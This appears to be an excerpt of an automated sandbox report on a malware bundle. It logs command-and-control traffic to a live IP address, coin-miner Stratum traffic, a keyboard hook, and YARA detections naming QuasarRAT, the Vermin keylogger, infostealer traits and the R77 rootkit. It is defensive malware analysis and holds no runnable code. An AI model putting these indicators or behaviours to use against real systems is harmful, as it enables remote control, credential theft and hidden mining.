                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then mov rax, qword ptr [rcx]2_2_00007FF6502452E0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then sub rsp, 38h2_2_00007FF65024BDB0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650247EB0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then sub rsp, 38h2_2_00007FF65024EF70
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then sub rsp, 38h2_2_00007FF650247F80
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650252090
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650252090
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650252090
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r132_2_00007FF650252090
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 4x nop then push r122_2_00007FF65022E8C4

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: 185.148.3.216
                    Source: Yara matchFile source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED
                    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 185.148.3.216:4000
                    Source: Joe Sandbox ViewASN Name: MAGNA-CAPAXFI MAGNA-CAPAXFI
                    Source: Network trafficSuricata IDS: 2017871 - Severity 2 - ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message : 192.168.2.4:49738 -> 31.220.102.19:3333
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.148.3.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.148.3.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.148.3.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.148.3.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.148.3.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.148.3.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.148.3.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.148.3.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.148.3.216
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.148.3.216
                    Source: Client.exe, 0000000A.00000002.1831773970.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micC
                    Source: powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: F4R5fd8grr.exe, 00000003.00000002.1725151297.0000000003121000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000A.00000002.1835510769.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, F4R5fd8grr.exe, 0000000B.00000002.1884972247.0000000002ABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1813131707.0000021C80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000013.00000002.1813131707.0000021C80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, Client.exe, 0000000A.00000002.1835510769.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                    Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://tools.keycdn.com/geo.json

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\SubDir\Client.exeJump to behavior

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 5fr5gthkjdg71.exe, type: SAMPLE
                    Source: Yara matchFile source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5fr5gthkjdg71.exe PID: 7452, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: F4R5fd8grr.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7916, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED

                    Operating System Destruction

                    barindex
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess information set: 01 00 00 00
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess information set: 01 00 00 00

                    System Summary

                    barindex
                    Source: 5fr5gthkjdg71.exe, type: SAMPLEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 5fr5gthkjdg71.exe, type: SAMPLEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 5fr5gthkjdg71.exe, type: SAMPLEMatched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 66.2.kaptsegthwf.exe.23e07f70000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 68.2.conhost.exe.1a646d10000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 66.2.kaptsegthwf.exe.23e07fa0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 68.2.conhost.exe.1a646d40000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 63.2.sc.exe.17cd5af0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 68.2.conhost.exe.1a646d10000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 66.2.kaptsegthwf.exe.23e07f70000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 63.2.sc.exe.17cd5b20000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 63.2.sc.exe.17cd5af0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: Detects Vermin Keylogger Author: Florian Roth
                    Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                    Source: 68.2.conhost.exe.1a646d40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 63.2.sc.exe.17cd5b20000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 66.2.kaptsegthwf.exe.23e07fa0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: 00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Rootkit_R77_5bab748b Author: unknown
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPEDMatched rule: Detects Quasar infostealer Author: ditekshen
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPEDMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPEDMatched rule: Detects Quasar infostealer Author: ditekshen
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeCode function: 1_2_00007FF6880C1394 NtRestoreKey,1_2_00007FF6880C1394
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF650224A40 NtDelayExecution,2_2_00007FF650224A40
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B882F04 GetProcessHeap,HeapAlloc,NtQuerySystemInformation,StrCmpNIW,GetProcessHeap,HeapFree,RtlFreeHeap,10_2_1B882F04
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B8828C8 NtEnumerateValueKey,NtEnumerateValueKey,10_2_1B8828C8
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B88202C NtQuerySystemInformation,StrCmpNIW,10_2_1B88202C
                    Source: C:\Windows\System32\dialer.exeCode function: 51_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,51_2_00000001400010C0
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5AC2B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,63_2_0000017CD5AC2B2C
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5AC28C8 NtEnumerateValueKey,NtEnumerateValueKey,63_2_0000017CD5AC28C8
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_00007FF62DC41394 NtCloseObjectAuditAlarm,66_2_00007FF62DC41394
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C7C300: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF731C7C300
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeFile created: C:\Windows\TEMP\dsarrsulkovb.sys
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_m42dpnhz.s4a.ps1
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C8A46C0_2_00007FF731C8A46C
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CA06D40_2_00007FF731CA06D4
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C848E80_2_00007FF731C848E8
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C7F9400_2_00007FF731C7F940
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C75E2C0_2_00007FF731C75E2C
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C9CE080_2_00007FF731C9CE08
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C9B1100_2_00007FF731C9B110
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C7A2FC0_2_00007FF731C7A2FC
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C7C3000_2_00007FF731C7C300
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C772880_2_00007FF731C77288
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C812240_2_00007FF731C81224
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C921500_2_00007FF731C92150
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C8B4F00_2_00007FF731C8B4F0
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CB24D00_2_00007FF731CB24D0
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C934040_2_00007FF731C93404
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C953700_2_00007FF731C95370
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C776C00_2_00007FF731C776C0
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C7A6640_2_00007FF731C7A664
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C938E40_2_00007FF731C938E4
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C748400_2_00007FF731C74840
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CAC7B80_2_00007FF731CAC7B8
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C71AA40_2_00007FF731C71AA4
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CB5A780_2_00007FF731CB5A78
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C92A300_2_00007FF731C92A30
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CAFA140_2_00007FF731CAFA14
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C81A000_2_00007FF731C81A00
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C8C9280_2_00007FF731C8C928
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CA89200_2_00007FF731CA8920
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C92CD80_2_00007FF731C92CD8
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CA8B9C0_2_00007FF731CA8B9C
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C94B180_2_00007FF731C94B18
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C85B200_2_00007FF731C85B20
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C8BB4C0_2_00007FF731C8BB4C
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C91EA00_2_00007FF731C91EA0
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C8AED40_2_00007FF731C8AED4
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C98D740_2_00007FF731C98D74
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CA06D40_2_00007FF731CA06D4
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731C8F1000_2_00007FF731C8F100
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeCode function: 0_2_00007FF731CB20000_2_00007FF731CB2000
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B630F61F2C2_2_000001B630F61F2C
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B630F6D0E02_2_000001B630F6D0E0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B630F738A82_2_000001B630F738A8
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B6311744A82_2_000001B6311744A8
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B63116DCE02_2_000001B63116DCE0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_000001B631162B2C2_2_000001B631162B2C
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF6502216C02_2_00007FF6502216C0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF650222F302_2_00007FF650222F30
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF6502422D02_2_00007FF6502422D0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF650226CA02_2_00007FF650226CA0
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: 2_2_00007FF6502227902_2_00007FF650222790
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B241F2C10_2_1B241F2C
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B2538A810_2_1B2538A8
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B24D0E010_2_1B24D0E0
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B882B2C10_2_1B882B2C
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B8944A810_2_1B8944A8
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_1B88DCE010_2_1B88DCE0
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_00007FFD9B89817810_2_00007FFD9B898178
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_00007FFD9B898FE810_2_00007FFD9B898FE8
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_00007FFD9B898FA810_2_00007FFD9B898FA8
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_00007FFD9B8A000F10_2_00007FFD9B8A000F
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeCode function: 10_2_00007FFD9B898FC810_2_00007FFD9B898FC8
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C741F2C22_2_000001C25C741F2C
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C74D0E022_2_000001C25C74D0E0
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C7538A822_2_000001C25C7538A8
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C772B2C22_2_000001C25C772B2C
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C77DCE022_2_000001C25C77DCE0
                    Source: C:\Windows\System32\conhost.exeCode function: 22_2_000001C25C7844A822_2_000001C25C7844A8
                    Source: C:\Windows\System32\dialer.exeCode function: 51_2_000000014000226C51_2_000000014000226C
                    Source: C:\Windows\System32\dialer.exeCode function: 51_2_00000001400014D851_2_00000001400014D8
                    Source: C:\Windows\System32\dialer.exeCode function: 51_2_000000014000256051_2_0000000140002560
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5981F2C63_2_0000017CD5981F2C
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD59938A863_2_0000017CD59938A8
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD598D0E063_2_0000017CD598D0E0
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5AC2B2C63_2_0000017CD5AC2B2C
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5AD44A863_2_0000017CD5AD44A8
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5ACDCE063_2_0000017CD5ACDCE0
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5AF07E063_2_0000017CD5AF07E0
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5AFC7F863_2_0000017CD5AFC7F8
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5AFCA0463_2_0000017CD5AFCA04
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5AF167063_2_0000017CD5AF1670
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B0091863_2_0000017CD5B00918
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B0295863_2_0000017CD5B02958
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B2D3F863_2_0000017CD5B2D3F8
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B213E063_2_0000017CD5B213E0
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B2D60463_2_0000017CD5B2D604
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B2227063_2_0000017CD5B22270
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B3151863_2_0000017CD5B31518
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B3355863_2_0000017CD5B33558
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B51F2C63_2_0000017CD5B51F2C
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B638A863_2_0000017CD5B638A8
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B5D0E063_2_0000017CD5B5D0E0
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B82B2C63_2_0000017CD5B82B2C
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B944A863_2_0000017CD5B944A8
                    Source: C:\Windows\System32\sc.exeCode function: 63_2_0000017CD5B8DCE063_2_0000017CD5B8DCE0
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07EFD0E066_2_0000023E07EFD0E0
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F038A866_2_0000023E07F038A8
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07EF1F2C66_2_0000023E07EF1F2C
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F4DCE066_2_0000023E07F4DCE0
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F544A866_2_0000023E07F544A8
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F42B2C66_2_0000023E07F42B2C
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F7167066_2_0000023E07F71670
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F7CA0466_2_0000023E07F7CA04
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F8295866_2_0000023E07F82958
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F8091866_2_0000023E07F80918
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F7C7F866_2_0000023E07F7C7F8
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: 66_2_0000023E07F707E066_2_0000023E07F707E0
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645CE38A868_2_000001A645CE38A8
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645CDD0E068_2_000001A645CDD0E0
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645CD1F2C68_2_000001A645CD1F2C
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645EEDCE068_2_000001A645EEDCE0
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645EF44A868_2_000001A645EF44A8
                    Source: C:\Windows\System32\conhost.exeCode function: 68_2_000001A645EE2B2C68_2_000001A645EE2B2C
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\FA9.tmp 22EE7B8104599B47313195598FFC34AAFD6A6552DCCE0E7B3232CED3A90AC9A4
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeCode function: String function: 00007FF6880C1394 appears 34 times
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeCode function: String function: 00007FF62DC41394 appears 34 times
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: String function: 00007FF650252240 appears 59 times
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeCode function: String function: 00007FF650251000 appears 107 times
                    Source: FA9.tmp.2.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Source: Bara.exe.2.drStatic PE information: Number of sections : 11 > 10
                    Source: GR55Qg1hth.exe.0.drStatic PE information: Number of sections : 11 > 10
